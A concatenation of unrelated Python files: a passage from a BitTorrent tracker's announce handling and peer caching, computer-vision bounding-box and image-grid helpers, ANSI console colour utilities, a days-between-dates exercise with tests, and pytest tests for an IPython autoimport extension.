        if ( not cache or len(cache[1]) < rsize
             or cache[0] + self.config['min_time_between_cache_refreshes'] < clock() ):
            # rebuild the cache from both seed and leecher buckets
            bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
            cache = [ clock(), bc[0][0].values() + bc[0][1].values() ]
            self.cached_t[infohash] = cache
            shuffle(cache[1])
        cache = cache[1]
        data['peers'] = cache[-rsize:]
        del cache[-rsize:]    # consume handed-out peers so they rotate
        return data

    data['interval'] = self.reannounce_interval
    if stopped or not rsize:     # save some bandwidth
        data['peers'] = []
        return data
    bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
    len_l = len(bc[0][0])   # cached leechers
    len_s = len(bc[0][1])   # cached seeds
    if not (len_l+len_s):   # caches are empty!
        data['peers'] = []
        return data
    # share of the response that should be leechers
    l_get_size = int(float(rsize)*(len_l)/(len_l+len_s))
    cache = self.cached.setdefault(infohash,[None,None,None])[return_type]
    if cache and ( not cache[1]
                   or (is_seed and len(cache[1]) < rsize)
                   or len(cache[1]) < l_get_size
                   or cache[0]+self.config['min_time_between_cache_refreshes'] < self.cachetime ):
        cache = None
    if not cache:
        # rebuild this return_type's cache, folding in multitracker peers
        peers = self.downloads[infohash]
        vv = [[],[],[]]
        for key, ip, port in self.t2tlist.harvest(infohash):   # empty if disabled
            if not peers.has_key(key):
                vv[0].append({'ip': ip, 'port': port, 'peer id': key})
                vv[1].append({'ip': ip, 'port': port})
                vv[2].append(compact_peer_info(ip, port))
        cache = [ self.cachetime,
                  bc[return_type][0].values()+vv[return_type],
                  bc[return_type][1].values() ]
        shuffle(cache[1])   # cache[1] = leechers, cache[2] = seeds
        shuffle(cache[2])
        self.cached[infohash][return_type] = cache
        for rr in xrange(len(self.cached[infohash])):
            if rr != return_type:
                try:
                    self.cached[infohash][rr][1].extend(vv[rr])
                except:
                    pass
    if len(cache[1]) < l_get_size:
        # not enough leechers: hand out everything (plus seeds to leechers)
        peerdata = cache[1]
        if not is_seed:
            peerdata.extend(cache[2])
        cache[1] = []
        cache[2] = []
    else:
        if not is_seed:
            # seeds fill the remainder of the response for leechers
            peerdata = cache[2][l_get_size-rsize:]
            del cache[2][l_get_size-rsize:]
            rsize -= len(peerdata)
        else:
            peerdata = []
        if rsize:
            peerdata.extend(cache[1][-rsize:])
            del cache[1][-rsize:]
    if return_type == 2:
        peerdata = ''.join(peerdata)
    data['peers'] = peerdata
    return data
def get(self, connection, path, headers):
    """HTTP dispatch for all tracker GET requests.

    Routes the request path to the info page, file download, favicon,
    scrape, or the main announce handler, after IP allow/ban filtering
    and query-string parsing.

    :param connection: HTTP connection object providing get_ip()
    :param path: raw request path (with query string)
    :param headers: request headers (used for forwarded-IP detection)
    :return: (status, reason, headers, body) HTTP response tuple
    """
    real_ip = connection.get_ip()
    ip = real_ip
    if is_ipv4(ip):
        ipv4 = True
    else:
        try:
            # compact responses only work for v4; try mapping v6 down
            ip = ipv6_to_ipv4(ip)
            ipv4 = True
        except ValueError:
            ipv4 = False

    if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip))
         or (self.banned_IPs and self.banned_IPs.includes(ip)) ):
        return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
            bencode({'failure reason':
            'your IP is not allowed on this tracker'}))

    nip = get_forwarded_ip(headers)   # honor proxy headers unless disabled
    if nip and not self.only_local_override_ip:
        ip = nip
        try:
            ip = to_ipv4(ip)
            ipv4 = True
        except ValueError:
            ipv4 = False

    paramslist = {}
    def params(key, default = None, l = paramslist):
        # first value of a query parameter, or default
        if l.has_key(key):
            return l[key][0]
        return default

    try:
        (scheme, netloc, path, pars, query, fragment) = urlparse(path)
        if self.uq_broken == 1:
            # work around clients that fail to encode '+' properly
            path = path.replace('+',' ')
            query = query.replace('+',' ')
        path = unquote(path)[1:]
        for s in query.split('&'):
            if s:
                i = s.index('=')
                kw = unquote(s[:i])
                paramslist.setdefault(kw, [])
                paramslist[kw] += [unquote(s[i+1:])]

        if path == '' or path == 'index.html':
            return self.get_infopage()
        if (path == 'file'):
            return self.get_file(params('info_hash'))
        if path == 'favicon.ico' and self.favicon is not None:
            return (200, 'OK', {'Content-Type' : 'image/x-icon'}, self.favicon)

        # automated access from here on

        if path in ('scrape', 'scrape.php', 'tracker.php/scrape'):
            return self.get_scrape(paramslist)
        if not path in ('announce', 'announce.php', 'tracker.php/announce'):
            return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)

        # main tracker function
        filtered = self.Filter.check(real_ip, paramslist, headers)
        if filtered:
            return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason': filtered}))
        infohash = params('info_hash')
        if not infohash:
            raise ValueError, 'no info hash'
        notallowed = self.check_allowed(infohash, paramslist)
        if notallowed:
            return notallowed
        event = params('event')
        rsize = self.add_data(infohash, event, ip, paramslist)
    except ValueError, e:
        # any malformed parameter funnels to a single 400 response
        return (400, 'Bad Request', {'Content-Type': 'text/plain'},
            'you sent me garbage - ' + str(e))

    if self.aggregate_forward and not paramslist.has_key('tracker'):
        # relay this announce upstream to an aggregating tracker
        self.aggregate_senddata(query)

    if self.is_aggregator:     # don't return peer data here
        return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
            bencode({'response': 'OK'}))

    if params('compact') and ipv4:
        return_type = 2       # compact binary peer list
    elif params('no_peer_id'):
        return_type = 1       # dicts without peer ids
    else:
        return_type = 0       # full peer dicts

    data = self.peerlist(infohash, event=='stopped',
                         params('tracker'), not params('left'),
                         return_type, rsize)

    if paramslist.has_key('scrape'):    # deprecated
        data['scrape'] = self.scrapedata(infohash, False)

    if self.dedicated_seed_id:
        if params('seed_id') == self.dedicated_seed_id and params('left') == 0:
            self.is_seeded[infohash] = True
    if params('check_seeded') and self.is_seeded.get(infohash):
        data['seeded'] = 1

    return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode(data))
def natcheckOK(self, infohash, peerid, ip, port, not_seed):
    """Cache a reachable (NAT-check passed) peer in all three response formats.

    becache layout: index 0 = full dicts, 1 = dicts without peer id,
    2 = compact strings; each is split [leechers, seeds], so a peer with
    nothing left (not_seed == 0) lands in the seed bucket.
    """
    bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
    bc[0][not not_seed][peerid] = Bencached(bencode({'ip': ip, 'port': port,
                                                     'peer id': peerid}))
    bc[1][not not_seed][peerid] = Bencached(bencode({'ip': ip, 'port': port}))
    bc[2][not not_seed][peerid] = compact_peer_info(ip, port)
def natchecklog(self, peerid, ip, port, result):
    """Write one NAT-check outcome in an Apache-combined-log-style line.

    :param result: HTTP-ish status code (200 success, 503 failed, 404 stale)
    """
    year, month, day, hour, minute, second, a, b, c = localtime(time())
    print '%s - %s [%02d/%3s/%04d:%02d:%02d:%02d] "!natcheck-%s:%i" %i 0 - -' % (
        ip, quote(peerid), day, months[month], year, hour, minute, second,
        ip, port, result)
def connectback_result(self, result, downloadid, peerid, ip, port):
    """Callback invoked when a NatCheck connect-back attempt finishes.

    :param result: truthy when the tracker could connect back to the peer
    Updates the peer's 'nat' counter (0 = reachable, >0 = failed attempts)
    and promotes reachable peers into the response caches.
    """
    record = self.downloads.get(downloadid, {}).get(peerid)
    if ( record is None
             or (record['ip'] != ip and record.get('given ip') != ip)
             or record['port'] != port ):
        # peer disappeared or re-announced with new contact info: stale check
        if self.config['log_nat_checks']:
            self.natchecklog(peerid, ip, port, 404)
        return
    if self.config['log_nat_checks']:
        if result:
            x = 200
        else:
            x = 503
        self.natchecklog(peerid, ip, port, x)
    if not record.has_key('nat'):
        # first result for this peer
        record['nat'] = int(not result)
        if result:
            self.natcheckOK(downloadid,peerid,ip,port,record['left'])
    elif result and record['nat']:
        # previously failing peer is now reachable
        record['nat'] = 0
        self.natcheckOK(downloadid,peerid,ip,port,record['left'])
    elif not result:
        record['nat'] += 1
def remove_from_state(self, *l):
    """Delete the named keys from the persisted state dict, ignoring
    keys that are absent."""
    for s in l:
        try:
            del self.state[s]
        except:
            pass
def save_state(self):
    """Persist tracker state to the dfile (bencoded) and reschedule itself
    to run again after save_dfile_interval."""
    self.rawserver.add_task(self.save_state, self.save_dfile_interval)
    h = open(self.dfile, 'wb')
    h.write(bencode(self.state))
    h.close()
def parse_allowed(self):
    """Periodically reload the set of allowed torrents.

    Reads either the allowed_dir of .torrent files or the allowed_list
    text file (skipped when its mtime is unchanged), then registers any
    newly added torrents in the download/completed/seed-count tables.
    """
    self.rawserver.add_task(self.parse_allowed, self.parse_dir_interval)
    if self.config['allowed_dir']:
        r = parsedir( self.config['allowed_dir'], self.allowed,
                      self.allowed_dir_files, self.allowed_dir_blocked,
                      [".torrent"] )
        ( self.allowed, self.allowed_dir_files, self.allowed_dir_blocked,
            added, garbage2 ) = r
        self.state['allowed'] = self.allowed
        self.state['allowed_dir_files'] = self.allowed_dir_files
        self.t2tlist.parse(self.allowed)
    else:
        f = self.config['allowed_list']
        if self.allowed_list_mtime == os.path.getmtime(f):
            return   # unchanged since last parse
        try:
            r = parsetorrentlist(f, self.allowed)
            (self.allowed, added, garbage2) = r
            self.state['allowed_list'] = self.allowed
        except (IOError, OSError):
            print '**warning** unable to read allowed torrent list'
            return
        self.allowed_list_mtime = os.path.getmtime(f)
    # make sure newly-allowed torrents have tracking entries
    for infohash in added.keys():
        self.downloads.setdefault(infohash, {})
        self.completed.setdefault(infohash, 0)
        self.seedcount.setdefault(infohash, 0)
def read_ip_lists(self):
    """Periodically reload the allowed/banned IP files when their mtimes
    change; failures leave the previous lists untouched."""
    self.rawserver.add_task(self.read_ip_lists,self.parse_dir_interval)

    f = self.config['allowed_ips']
    if f and self.allowed_ip_mtime != os.path.getmtime(f):
        self.allowed_IPs = IP_List()
        try:
            self.allowed_IPs.read_fieldlist(f)
            self.allowed_ip_mtime = os.path.getmtime(f)
        except (IOError, OSError):
            print '**warning** unable to read allowed_IP list'

    f = self.config['banned_ips']
    if f and self.banned_ip_mtime != os.path.getmtime(f):
        self.banned_IPs = IP_Range_List()
        try:
            self.banned_IPs.read_rangelist(f)
            self.banned_ip_mtime = os.path.getmtime(f)
        except (IOError, OSError):
            print '**warning** unable to read banned_IP list'
def delete_peer(self, infohash, peerid):
    """Remove one peer from a torrent, keeping the seed count and the
    pre-bencoded response caches consistent."""
    dls = self.downloads[infohash]
    peer = dls[peerid]
    if not peer['left']:
        self.seedcount[infohash] -= 1
    if not peer.get('nat',-1):
        # peer was cached as reachable: purge it from every cache format
        l = self.becache[infohash]
        y = not peer['left']    # bucket: 0 = leechers, 1 = seeds
        for x in l:
            del x[y][peerid]
    del self.times[infohash][peerid]
    del dls[peerid]
def expire_downloaders(self):
    """Drop peers that have not announced since the previous sweep, then
    (unless keep_dead) forget torrents that are empty and no longer
    allowed. Reschedules itself at timeout_downloaders_interval."""
    for x in self.times.keys():
        for myid, t in self.times[x].items():
            if t < self.prevtime:
                self.delete_peer(x,myid)
    self.prevtime = clock()
    if (self.keep_dead != 1):
        for key, value in self.downloads.items():
            if len(value) == 0 and (
                    self.allowed is None or not self.allowed.has_key(key) ):
                del self.times[key]
                del self.downloads[key]
                del self.seedcount[key]
    self.rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
def track(args):
    """Command-line entry point for the tracker.

    Parses config from *args* (prints parameter help when empty), binds the
    listening socket, and serves requests until shutdown, saving state on
    exit.
    """
    if len(args) == 0:
        print formatDefinitions(defaults, 80)
        return
    try:
        config, files = parseargs(args, defaults, 0, 0)
    except ValueError, e:
        print 'error: ' + str(e)
        print 'run with no arguments for parameter explanations'
        return
    r = RawServer(Event(), config['timeout_check_interval'],
                  config['socket_timeout'], ipv6_enable = config['ipv6_enabled'])
    t = Tracker(config, r)
    r.bind(config['port'], config['bind'],
           reuse = True, ipv6_socket_style = config['ipv6_binds_v4'])
    r.listen_forever(HTTPHandler(t.get, config['min_time_between_log_flushes']))
    t.save_state()   # persist final state after the serve loop exits
    print '# Shutting down: ' + isotime()
def size_format(s):
    """Render a byte count as a short human-readable string.

    Uses binary units: B, KiB, MiB (integer-truncated) and GiB, TiB
    (two decimal places).

    Fix: dropped the Python-2-only long-literal suffixes (1073741824L,
    1099511627776L); plain int literals behave identically in Python 2
    and keep the function valid under Python 3.

    :param s: non-negative size in bytes
    :return: formatted string such as '2KiB' or '1.5GiB'
    """
    if (s < 1024):
        r = str(s) + 'B'
    elif (s < 1048576):
        r = str(int(s/1024)) + 'KiB'
    elif (s < 1073741824):
        r = str(int(s/1048576)) + 'MiB'
    elif (s < 1099511627776):
        # truncate to two decimals rather than round
        r = str(int((s/1073741824.0)*100.0)/100.0) + 'GiB'
    else:
        r = str(int((s/1099511627776.0)*100.0)/100.0) + 'TiB'
    return(r)
|
"""
Some computer vision utility functions
"""
import base64, cv2, os, glob
import numpy as np
import math
def resize_pad_image(img, new_dims, pad_output=True):
    """Resize *img* to new_dims = (width, height).

    When pad_output is True, the image is first letterboxed with black on
    the right or bottom edge so its aspect ratio matches new_dims, avoiding
    distortion. Returns (resized_image, [sx, sy]) where [sx, sy] maps box
    coordinates on the output back onto the original image.
    """
    src_h, src_w, _ = img.shape
    src_ar = float(src_w) / float(src_h)
    dst_ar = float(new_dims[0]) / float(new_dims[1])
    # identity mapping unless one of the branches below overrides it
    scale_back = [1.0, 1.0]
    if pad_output is True:
        if dst_ar > src_ar:
            # target is relatively wider: pad columns on the right edge
            pad_px = abs(src_h * dst_ar - src_w)
            img = cv2.copyMakeBorder(img, 0, 0, 0, int(pad_px), cv2.BORDER_CONSTANT, None, [0, 0, 0])
            scale_back = [float(src_w) / (float(new_dims[1]) * src_ar),
                          float(src_h) / float(new_dims[1])]
        elif dst_ar < src_ar:
            # target is relatively taller: pad rows along the bottom edge
            pad_px = abs(src_w / dst_ar - src_h)
            img = cv2.copyMakeBorder(img, 0, int(pad_px), 0, 0, cv2.BORDER_CONSTANT, None, [0, 0, 0])
            scale_back = [float(src_w) / float(new_dims[0]),
                          float(src_h) / (float(new_dims[0]) / src_ar)]
        elif dst_ar == src_ar:
            # aspect ratios already agree: uniform scale, no padding
            ratio = float(src_w) / new_dims[0]
            scale_back = [ratio, ratio]
    return cv2.resize(img, (new_dims[0], new_dims[1])), scale_back
def crop_img(bbox, im):
    """Return the sub-image of *im* covered by bbox = [x1, y1, x2, y2]."""
    x1, y1, x2, y2 = (int(v) for v in bbox[:4])
    # numpy slicing: rows are y, columns are x
    return im[y1:y2, x1:x2]
def compute_dist(vec1, vec2, mode='cosine'):
    """
    compute the distance between two given vectors.
    :param vec1: np.array vector
    :param vec2: np.array vector
    :param mode: cosine for cosine distance; l2 for l2 norm distance;
    :return: distance of the input mode, or None for an unknown mode
    """
    if mode == 'cosine':
        # 1 - cosine similarity
        return 1 - np.dot(vec1, vec2) / np.linalg.norm(vec1) / np.linalg.norm(vec2)
    if mode == 'l2':
        return np.linalg.norm(vec1 - vec2)
    return None
def make_grids_of_images_from_folder(images_path, image_shape, grid_shape):
    """
    makes grids of images in numpy array format from an image folder.
    :param images_path: string, path to images folder
    :param image_shape: tuple, size each image will be resized to for display (w, h)
    :param grid_shape: tuple, shape of image grid (rows,cols)
    :return: list of grid images in numpy array format, or None when the
        folder holds no .jpg/.jpeg/.png files
    example usage: grids = make_grids_of_images('/Pictures', (64,64),(5,5))

    NOTE(review): a trailing, partially-filled grid is never appended to the
    result -- only grids that were completely filled are returned; confirm
    this is intended.
    """
    # get all images from folder
    img_path_glob = glob.iglob(os.path.join(images_path, '*'))
    img_path_list = []
    for ip in img_path_glob:
        if ip.endswith('.jpg') or ip.endswith('.jpeg') or ip.endswith('.png'):
            img_path_list.append(ip)
    if len(img_path_list) < 1:
        print 'No images found at {}'.format(images_path)
        return None
    image_grids = []
    # start with black canvas to draw images to
    grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
                          dtype=np.uint8)
    cursor_pos = [0, 0]   # (x, y) paste position on the current canvas
    for img_path in img_path_list:
        img = cv2.imread(img_path)
        if img is None:
            print 'ERROR: reading {}. skipping.'.format(img_path)
            continue
        img = cv2.resize(img, image_shape)
        # draw image to black canvas
        grid_image[cursor_pos[1]:cursor_pos[1] + image_shape[1], cursor_pos[0]:cursor_pos[0] + image_shape[0]] = img
        cursor_pos[0] += image_shape[0]  # increment cursor x position
        if cursor_pos[0] >= grid_shape[0] * image_shape[0]:
            # row full: wrap to the start of the next row
            cursor_pos[1] += image_shape[1]  # increment cursor y position
            cursor_pos[0] = 0
            if cursor_pos[1] >= grid_shape[1] * image_shape[1]:
                # canvas full: store it and start a fresh one
                cursor_pos = [0, 0]
                # reset black canvas
                grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
                                      dtype=np.uint8)
                image_grids.append(grid_image)
    return image_grids
def make_grids_of_images_from_list(image_list, image_shape, grid_shape):
    """
    makes grids of images in numpy array format from a list of images.
    :param image_list: list, input images (numpy arrays readable by cv2)
    :param image_shape: tuple, size each image will be resized to for display (w, h)
    :param grid_shape: tuple, shape of image grid (rows,cols)
    :return: list of grid images in numpy array format
    example usage: grids = make_grids_of_images_from_list(imgs, (64,64),(5,5))

    NOTE(review): as in the folder variant, a trailing partially-filled grid
    is never appended to the result; confirm this is intended.
    """
    image_grids = []
    # start with black canvas to draw images to
    grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
                          dtype=np.uint8)
    cursor_pos = [0, 0]   # (x, y) paste position on the current canvas
    for img in image_list:
        img = cv2.resize(img, image_shape)
        # draw image to black canvas
        grid_image[cursor_pos[1]:cursor_pos[1] + image_shape[1], cursor_pos[0]:cursor_pos[0] + image_shape[0]] = img
        cursor_pos[0] += image_shape[0]  # increment cursor x position
        if cursor_pos[0] >= grid_shape[0] * image_shape[0]:
            # row full: wrap to the start of the next row
            cursor_pos[1] += image_shape[1]  # increment cursor y position
            cursor_pos[0] = 0
            if cursor_pos[1] >= grid_shape[1] * image_shape[1]:
                # canvas full: store it and start a fresh one
                cursor_pos = [0, 0]
                # reset black canvas
                grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
                                      dtype=np.uint8)
                image_grids.append(grid_image)
    return image_grids
def bb_intersection_over_union(boxA, boxB):
    """Compute intersection-over-union of two boxes [x1, y1, x2, y2]
    with inclusive pixel coordinates.

    Fix: for disjoint boxes both (xB - xA + 1) and (yB - yA + 1) are
    negative, and their product came out positive, reporting a bogus
    non-zero IoU; each side is now clamped at zero so non-overlapping
    boxes yield 0.0.

    :return: IoU in [0.0, 1.0]
    """
    # determine the (x, y)-coordinates of the intersection rectangle
    xA = max(boxA[0], boxB[0])
    yA = max(boxA[1], boxB[1])
    xB = min(boxA[2], boxB[2])
    yB = min(boxA[3], boxB[3])
    # compute the area of intersection rectangle, clamping each side at 0
    interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)
    # compute the area of both the prediction and ground-truth rectangles
    boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
    boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
    # intersection area divided by union area
    iou = interArea / float(boxAArea + boxBArea - interArea)
    return iou
def centroid_from_bb(bb):
    """Return the (x, y) centre of bb = [x1, y1, x2, y2] as a numpy array."""
    x1, y1, x2, y2 = bb
    # offset the top-left corner by half the (absolute) width/height
    return np.array([x1 + abs(x2 - x1) / 2, y1 + abs(y2 - y1) / 2])
def dist_btwn_bb_centroids(bb1, bb2):
    """Euclidean distance between the centroids of two bounding boxes."""
    delta = centroid_from_bb(bb1) - centroid_from_bb(bb2)
    return math.sqrt(delta[0] * delta[0] + delta[1] * delta[1])
def wid_ht_from_bb(bb):
    """Return (width, height) of bb = [x1, y1, x2, y2], truncated to ints."""
    return int(abs(bb[2] - bb[0])), int(abs(bb[3] - bb[1]))
def check_tracks_equal(track1, track2):
    """Treat two tracks as the same object when their latest bounding
    boxes lie within an L2 distance of 50 of each other."""
    gap = np.linalg.norm(track2.get_latest_bb() - track1.get_latest_bb())
    return gap < 50
def clamp_negative_nums(bb):
    """Return a copy of *bb* with every negative coordinate replaced by 0."""
    return [0 if pnt < 0 else pnt for pnt in bb]
def bb_has_width_height(bb):
    """True when bb = [x1, y1, x2, y2] spans more than one pixel in both
    dimensions (signed: assumes x2 >= x1 and y2 >= y1)."""
    return int(bb[2] - bb[0]) > 1 and int(bb[3] - bb[1]) > 1
def bb_as_ints(bb):
    """Return the first four bbox coordinates truncated to ints."""
    return [int(bb[i]) for i in range(4)]
|
# ANSI SGR attribute strings used as style "types" by mprint()/ctext().
# Format "<attr>;<fg>;<bg>": 7 = reverse video, 3x = foreground, 4x = background.
quiet = False          # module-level default; Settings.quiet is what mprint checks
log = '7;37;40'        # white on black
info = '7;32;40'       # green on black
warn = '7;33;40'       # yellow on black
error = '7;31;40'      # red on black
state = '7;34;47'      # blue on white
class Settings:
    """Mutable runtime flags shared by the console-printing helpers."""
    quiet = False  # when True, mprint() suppresses all output
def mprint(text: str, type: str):
    """Print *text* wrapped in ANSI SGR code *type*, unless Settings.quiet."""
    if Settings.quiet:
        return
    print(f'\x1b[{type}m {text} \x1b[0m')
def ctext(text : str, type : str)->str:
    """Return *text* wrapped in the ANSI escape sequence for SGR code *type*."""
    return '\x1b[' + type + 'm ' + text + ' \x1b[0m'
|
# TODO
def daysBetweenDates_(year1, month1, day1, year2, month2, day2):
    # Coarse grain approach
    """Roughly estimate the number of days between two dates.

    Uses 365.25 days per year and 30.4 days per month, truncating each
    component separately, so results are only approximate.
    """
    # assert date2 greater than date1
    # assert valid dates (ie no 31st June)
    return (int((year2 - year1) * 365.25)
            + int((month2 - month1) * 30.4)
            + int(day2 - day1))
def testDaysBetweenDates():
    """Smoke-test daysBetweenDates_ against a handful of known gaps."""
    cases = [
        ((2017, 12, 30, 2017, 12, 30), 0),    # same day
        ((2017, 12, 30, 2017, 12, 31), 1),    # adjacent days
        ((2017, 12, 30, 2018, 1, 1), 2),      # new year
        ((2012, 6, 29, 2013, 6, 29), 365),    # full year difference
    ]
    for args, expected in cases:
        assert daysBetweenDates_(*args) == expected
    print("Congratulations! Your daysBetweenDates")
    print("function is working correctly!")
testDaysBetweenDates()
####################################################################
def isLeapYear(year):
    """Gregorian leap-year rule: divisible by 4, except centuries unless
    also divisible by 400."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def daysInMonth(year, month):
    """Number of days in the given month of *year* (None for an invalid
    month number)."""
    if month == 2:
        # inline Gregorian leap-year rule
        leap = year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
        return 29 if leap else 28
    if month in (4, 6, 9, 11):
        return 30
    if month in (1, 3, 5, 7, 8, 10, 12):
        return 31
# Using a helper functions
def nextDay(year, month, day):
    """Return the date one day after (year, month, day), rolling over
    month and year boundaries via daysInMonth."""
    if day < daysInMonth(year, month):
        return year, month, day + 1
    if month == 12:
        return year + 1, 1, 1
    return year, month + 1, 1
def daysBetweenDates__(year1, month1, day1, year2, month2, day2):
    """Count the days from date1 to date2 by stepping one day at a time.

    Assumes both dates are valid Gregorian dates and that date1 is not
    after date2.
    """
    count = 0
    current = (year1, month1, day1)
    target = (year2, month2, day2)
    while current != target:
        current = nextDay(*current)
        count += 1
    return count
def test():
    """Run daysBetweenDates__ against expected values and report per case.

    Fix: the failure message used a placeholder-free f-string followed by a
    stray set literal ({args}), printing e.g. "Test with data: {(...)} failed";
    the arguments are now interpolated into the f-string properly.
    """
    test_cases = [
        ((2012, 9, 30, 2012, 10, 30), 30),
        # NOTE(review): 2012 was a leap year, so this span is actually 366
        # days; the expected 360 makes the case report "failed" -- confirm
        # whether that is the intended (exercise) behavior.
        ((2012, 1, 1, 2013, 1, 1), 360),
        ((2012, 9, 1, 2012, 9, 4), 3),
    ]
    for (args, answer) in test_cases:
        result = daysBetweenDates__(*args)
        if result != answer:
            print(f"Test with data: {args} failed")
        else:
            print("Test case passed!")
test()
def dateIsBefore(year1, month1, day1, year2, month2, day2):
    """Returns True if year1-month1-day1 is strictly before
    year2-month2-day2. Otherwise, returns False."""
    # tuple comparison is lexicographic: year, then month, then day
    return (year1, month1, day1) < (year2, month2, day2)
def daysBetweenDates(year1, month1, day1, year2, month2, day2):
    """Returns the number of days between year1/month1/day1
    and year2/month2/day2. Assumes inputs are valid dates
    in Gregorian calendar.

    Raises AssertionError when date2 is before date1.

    Fix: removed a dead leap-year stub (`if year1 % 4 == 0:` guarding a
    bare string literal), which executed as a no-op; leap years are already
    handled correctly by nextDay()/daysInMonth().
    """
    # program defensively! # using helper function as assertion
    assert not dateIsBefore(year2, month2, day2, year1, month1, day1)
    days = 0
    while dateIsBefore(year1, month1, day1, year2, month2, day2):
        year1, month1, day1 = nextDay(year1, month1, day1)
        days += 1
    return days
def test():
    """Exercise daysBetweenDates on multi-month and multi-year spans.

    Fix: the failure message used a placeholder-free f-string followed by a
    stray set literal ({args}); the arguments are now interpolated into the
    f-string properly.
    """
    test_cases = [
        ((2012, 1, 1, 2012, 2, 28), 58),
        ((2012, 1, 1, 2012, 3, 1), 60),
        ((2011, 6, 30, 2012, 6, 30), 366),
        ((2011, 1, 1, 2012, 8, 8), 585),
        ((1900, 1, 1, 1999, 12, 31), 36523),
    ]
    for (args, answer) in test_cases:
        result = daysBetweenDates(*args)
        if result != answer:
            print(f"Test with data: {args} failed")
        else:
            print("Test case passed!")
test()
|
from pathlib import Path
import IPython.utils.io
import IPython.testing.globalipapp
import pytest
@pytest.fixture(scope="module")
def global_ip():
    """Module-scoped IPython shell with the test directory and its parent
    prepended to the kernel's sys.path, so test packages are importable."""
    ip = IPython.testing.globalipapp.start_ipython()
    path = Path(__file__)
    ip.run_cell("import sys; sys.path[:0] = [{!r}, {!r}]".format(
        str(path.parents[1]), str(path.parents[0])))
    return ip
@pytest.fixture
def ip(global_ip):
    """Per-test IPython: fresh user namespace with ipython_autoimport loaded.

    Teardown evicts any modules imported from this test directory (so each
    test re-imports them cleanly) and unloads the extension.
    """
    global_ip.run_cell("%reset -f")
    global_ip.run_cell("%load_ext ipython_autoimport")
    yield global_ip
    with IPython.utils.io.capture_output():
        global_ip.run_cell(
            "for name, mod in list(sys.modules.items()):\n"
            "    if getattr(mod, '__file__', '').startswith({!r}):\n"
            "        del sys.modules[name]"
            .format(str(Path(__file__).parent)))
    global_ip.run_cell("%unload_ext ipython_autoimport")
@pytest.mark.parametrize("name", ["a", "a.b", "a.b.c"])
def test_autoimport(ip, name):
    # Touching an unimported dotted name should print one "Autoimport:" line
    # per package level, then evaluate to the module's __name__.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("{}.__name__".format(name))
    parts = name.split(".")
    assert (captured.stdout
            == "{}Out[1]: {!r}\n".format(
                "".join("Autoimport: import {}\n".format(
                    ".".join(parts[:i + 1])) for i in range(len(parts))),
                name))
def test_sub_submodule(ip):
    # With a.b already imported, accessing a.b.c should auto-import only
    # the missing submodule.
    ip.run_cell("import a.b")
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("a.b.c.__name__")
    assert captured.stdout == "Autoimport: import a.b.c\nOut[1]: 'a.b.c'\n"
def test_no_import(ip):
    # A missing attribute on an auto-imported module should surface as an
    # AttributeError, not be swallowed into an ImportError.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("a.not_here")
    # Exact message changes between Python versions.
    assert "has no attribute 'not_here'" in captured.stdout.splitlines()[-1]
    assert "ImportError" not in captured.stdout
def test_setattr(ip):
    # Assigning an attribute on an auto-imported module must actually stick.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("a; a.b = 42; 'b' in vars(a), a.b")
    assert captured.stdout == "Autoimport: import a\nOut[1]: (True, 42)\n"
def test_closure(ip):
    # Closures over user-namespace variables must still resolve normally.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("x = 1; (lambda: x)()")
    assert captured.stdout == "Out[1]: 1\n"
def test_del(ip):
    # Deleting a user variable must not be intercepted by the autoimport hook.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("x = 1; del x; print('ok')")
    assert captured.stdout == "ok\n"
def test_list(ip):
    # %autoimport -l lists the imports performed during the session.
    ip.run_cell("os")
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("%autoimport -l")
    assert (captured.stdout ==
            "Autoimport: the following autoimports were run:\nimport os\n")
def test_no_list(ip):
    # %autoimport -l on a fresh session reports that nothing was imported.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("%autoimport -l")
    assert (captured.stdout ==
            "Autoimport: no autoimports in this session yet.\n")
def test_noclear(ip):
    # Clearing a symbol that was never auto-imported reports a cache miss.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("%autoimport -c ipython_autoimport_test_noclear")
    assert (
        captured.stdout ==
        "Autoimport: didn't find symbol "
        "'ipython_autoimport_test_noclear' in autoimport cache.\n"
    )
@pytest.mark.parametrize("magic", ["time", "timeit -n 1 -r 1", "prun"])
def test_magics(ip, magic):
    # Execution magics must keep working with the autoimport hook installed.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("{} x = 1".format(magic))
    assert "error" not in captured.stdout.lower()
def test_no_autoimport_in_time(ip):
    # %time must not wrap the user namespace in the autoimporting dict.
    with IPython.utils.io.capture_output() as captured:
        ip.run_cell("%time type(get_ipython().user_ns)")
    assert "autoimport" not in captured.stdout.lower()
def test_unload(ip):
    # After unloading the extension, unknown names raise NameError again.
    with IPython.utils.io.capture_output() as captured:
